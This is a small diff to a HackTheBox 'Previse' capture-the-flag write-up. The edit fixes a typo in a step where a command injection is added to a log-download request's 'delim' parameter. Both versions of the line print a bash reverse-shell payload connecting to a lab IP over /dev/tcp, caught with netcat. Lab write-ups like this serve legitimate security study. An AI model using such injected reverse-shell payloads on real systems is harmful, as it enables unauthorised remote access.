nair0lf32/zer0ne-blog/content/writeups/HackTheBox/Previse/index.md

 Capture a log download request in burpsuite

-To `delim=comma` we add our shell code wich give us
-`delim=comma&bash -c 'exec bash -i &>/dev/tcp/10.10.14.108/2311 <&1'`
+To `delim=comma` we add our shell code which give us `delim=comma&bash -c 'exec bash -i &>/dev/tcp/10.10.14.108/2311 <&1'`

 we get a shell on netcat